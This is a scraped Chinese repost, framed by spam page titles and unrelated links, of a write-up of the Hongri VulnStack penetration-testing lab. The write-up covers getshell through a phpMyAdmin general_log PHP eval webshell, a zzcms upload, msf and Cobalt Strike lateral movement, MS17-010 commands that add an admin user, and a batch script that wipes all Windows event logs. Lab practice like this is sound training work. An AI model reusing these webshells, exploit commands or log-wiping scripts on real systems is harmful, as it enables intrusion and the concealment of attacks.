当前位置: 首页 > news >正文

做视频网站推广挣钱吗wordpress 过滤钩子

做视频网站推广挣钱吗,wordpress 过滤钩子,高端保姆,wordpress数据库链接目录 下载地址红日靶场基本环境配置攻击思维导图网络结构 系统环境配置外网打点对phpmyadmin渗透对zzcms的渗透#xff1a;getshell失败案例getshell成功案例模版制作#xff1a;应用导入上传#xff1a;其他方式#xff1a; 内网渗透信息收集msf上线#xff1a;搭建隧道内… 目录 下载地址红日靶场基本环境配置攻击思维导图网络结构 系统环境配置外网打点对phpmyadmin渗透对zzcms的渗透getshell失败案例getshell成功案例模版制作应用导入上传其他方式 内网渗透信息收集msf上线搭建隧道内网探测上线cs横向移动成功msf横向尝试失败了 换了ms17-010命令执行pocftp匿名登录失败痕迹清理bat参考链接 下载地址 下载地址 红日靶场 红队实战系列主要以真实企业环境为实例搭建一系列靶场通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATTCK攻击链路进行搭建开成完整闭环。后续也会搭建真实APT实战环境从实战中成长。关于环境可以模拟出各种各样实战路线目前给出作者实战的一套攻击实战路线如下虚拟机所有统一密码hongrisec2019 一、环境搭建 1.环境搭建测试 2.信息收集 二、漏洞利用 3.漏洞搜索与利用 4.后台Getshell上传技巧 5.系统信息收集 6.主机密码收集 三、内网搜集 7.内网–继续信息收集 8.内网攻击姿势–信息泄露 9.内网攻击姿势-MS08-067 10.内网攻击姿势-SMB远程桌面口令猜测 11.内网攻击姿势-Oracle数据库TNS服务漏洞 12.内网攻击姿势-RPC DCOM服务漏洞 四、横向移动 13.内网其它主机端口-文件读取 14.内网其它主机端口-redis 15.内网其它主机端口-redis Getshell 16.内网其它主机端口-MySQL数据库 17.内网其它主机端口-MySQL提权 五、构建通道 18.内网其它主机端口-代理转发 六、持久控制 19.域渗透-域成员信息收集 20.域渗透-基础服务弱口令探测及深度利用之powershell 21.域渗透-横向移动[wmi利用] 22.域渗透-C2命令执行 23.域渗透-利用DomainFronting实现对beacon的深度隐藏 24.域渗透-域控实现与利用 七、痕迹清理 25、日志清理 基本环境配置 攻击思维导图 网络结构 主机IP网卡Kali Linux192.168.200.*NATWindwos7192.168.200.* /192.168.52.*NAT/VMnet2Win2k3192.168.52.*VMnet2仅主机Windows192.168.52.*VMnet2仅主机 备注按照自己喜好可以设置NAT网卡和vmnet仅主机模式都行因为windows7只要主机能够通信就行。 添加一个vmnet2网卡仅主机模式用于内网域环境通信 点击应用保存 系统环境配置 windwos7使用双网卡 我这已经添加 启动靶机windows7 密码:hongrisec2019 启动其他两台域控制器环境 测试通信 查看域控制器环境 ping注意这里不能pingwindows7禁ping 启动windows7 的web环境 关闭防火墙或者开放80端口 到这里就可以开始渗透测试了 外网打点 目标192.168.200.128 直接扫全端口 还有永恒之蓝如果防火墙开启应该就没有了。 发现80和3306端口开放 访问网站发现phpstudy探针系统为windows7 这里看到www目录的文件位置 扫描一下目录 一些敏感文件 phpmyadmin的版本 对phpmyadmin渗透 测试弱密码 root root 没想到这么简单就进来了 因为版本很多已知漏洞无法使用有一些POChttps://www.exploit-db.com/exploits/25003 这里用常用方法getshellhttps://www.freebuf.com/articles/web/226240.html 收集到信息 show variables like %general%;general_log日志保存状态这里为off general_log_file日志保存路径开启日志保存并配置保存路径 set global general_log ON; set global general_log_file C:/phpStudy/WWW/log.php;select ?php eval($_POST[pwd]); ?;打开蚁剑连接 对zzcms的渗透 访问一下 尝试注册功能 成功 查找上传点 测试一下上传 先测试一下 上传图片成功但是需要审核这里就不能上传了找一下后台登录点 没注意这里 这里提示我们后台位置和账户密码大概漏洞存在与后台可能作者是想让我们从cms上进行拿shell这里也可将备份文件下载到本地进行代码审计 getshell失败案例 寻找上传点 图集上传点 寻找上传文件位置没找到 getshell成功案例 模版制作 模版文件这好像可以直接添加php文件 文件里面找到 应用导入上传 虽然我们不知道cms的应用怎么写的直接上传一个shell.php文件 打包换个名字上传 把member模块停用启用test 寻找上传文件 连接测试 这里我写错马了重新上传了一个test1连接 其他方式 可以通过3306登录获取shell我们在下载模板文件时可以看到数据库的用户名密码 这里没有进行测试 大家有兴趣可以尝试获取也可以通过网上披露的已知漏洞进行攻击也可以做深入的代码审计方法很多包括使用永痕之蓝漏洞msf可以直接提到system权限这里不在继续。 内网渗透 传个fscan扫一扫 信息收集 判断主机是否加入域 方法一 net time /domain #如果当前主机处于工作组中未加入域则显示找不到域控制器 #加入了域且当前用户为本地用户包括本地管理员则显示拒绝访问 加入了域且当前用户域用户则显示域控的时间方法二 net config workstation #如果命令返回信息中包含“工作站域”则说明该计算机已经加入了域。看下网段发现内网网段 方法三 echo %userdomain%这里可以看一下windows7使用杀软没 没有识别到杀软可以做msf上线或者做内网穿透或者冰蝎隧道不推荐看个人选择也可以上线cs做横向移动或者权限维持这里我选择做简单的权限维持。 msf上线 生成msf马 kali监听 上传马 执行 提权getsystem 搭建隧道 background 使用sockes模块 use auxiliary/server/socks_proxy set srvport 1050 run配置 vim /etc/proxychains4.conf 添加 内网探测 使用nmap探测一下存在防火墙 proxychains nmap -PN --script smb-vuln* -p139,445 192.168.52.138 proxychains nmap -PN --script smb-vuln* -p139,445 192.168.52.141上线cs横向移动成功 生成cs马 上传运行 提权 探测 抓取明文密码这里我密码改了就不放出来了 添加smb的监听因为我们拿到内网的一台权限了使用这台上面的权限横向到其他两台上 添加监听 选择win7和我们加的监听 另一台同样操作成功获取内网权限 msf横向尝试失败了 代理后直接可以横向移动 上面fscna探测出网段存在ms17-010直接利用利用失败了 怀疑是防火墙拦截了后面关了防火墙也不行 我这想用msf上线前面msf上线失败了因为kali的sock5代理有点问题我这用cs的代理 使用kali做socks4的代理 换了ms17-010命令执行poc 使用ms17-010命令执行poc //这里直接创建用户julien密码julien123 use auxiliary/admin/smb/ms17_010_command set COMMAND net user set RHOST 192.168.52.138 set COMMAND net user julien julien123 run //将hack用户添加到管理员组 set COMMAND net localgroup administrators julien /add run set COMMAND sc config tlntsvr start auto run set COMMAND net start telnet run set COMMAND netstat -an run发现138这台23端口无法打开命令执行有问题换成141这台远程是可以的但是一直提示我密码错误不知道什么原因 ftp匿名登录失败 use auxiliary/scanner/ftp/anonymous set rhosts 192.168.52.141 run不存在后面版本 但不能写入本次渗透就做到这里 痕迹清理bat 这里不在操作 echo off mode con cols40 lines7 color 89 title 自动清理日志 :up echo 清理中 请稍等... FOR /F delims %%I IN (WEVTUTIL EL) DO (WEVTUTIL CL %%I) cls for /L %%a in (10,-1,0 ) do ( echo ---------------------------------------- echo 每10分钟清理一次 echo ---------------------------------------- echo %%a 分钟后开始清理 echo ---------------------------------------- ping -n 60 localhost 1nul 2nul cls ) goto up参考链接 https://www.freebuf.com/articles/web/324441.html https://www.freebuf.com/articles/web/226240.html
http://www.zqtcl.cn/news/571956/

相关文章:

  • 网站模板安装建站之星凡客
  • 有没有电脑做兼职的网站吗网站和域名区别
  • 免费html网页模板素材网站修改wordpress后台登陆
  • 男女做啊免费视频网站网站做全景图
  • 网站域名 安全网站开发语言一般是用什么
  • 麦包包的网站建设分析网站开发一般要用到哪些软件有哪些
  • 关于内网站建设的请示天津住房与城乡建设厅网站首页
  • 企业网站免费源码装修公司需要多少钱
  • 沈阳建设网站费用群晖wordpress打不开
  • jsp网站开发 pdf建设植绒衣架网站
  • 做网站接单的网站做外贸网站价位
  • 金融商城快捷申请网站模板下载汕头网站建设和运营
  • 网站建设网站备案所需资料请兼职做企业网站设计怎么收费
  • 电脑配件经营网站的建设论文邯郸市环保局网站建设项目环境
  • 那些网站可以做反链免费游戏不用登录直接玩
  • 安徽网站建设的基本步骤接外贸订单的平台
  • 那些网站可以找得到做货代的广东企业微信网站开发
  • 海宁市建设局官方网站6哔哩哔哩网页版官网在线观看
  • 泉州网站建设轩奇网讯韩国美容网站模板
  • 培训好吗网站建设wordpress手游
  • 元典科技网站建设网页设计制作图片页面
  • 网站设置什么意思无代码搭建平台
  • 织梦做的网站后台登录做网站购买域名
  • 哈尔滨网站关键词优化排名合江做网站
  • 手机网站自动适配旅游网络营销方案
  • 敦化网站开发黔东南购物网站开发设计
  • 建设一个网站 需要提供什么如何免费推广自己的网站
  • 佛山企业网站制作公司中国互联网企业100强榜单
  • 买了域名就可以做网站怎么创造游戏软件
  • 广东广州电脑个人建站徐州网站排名公司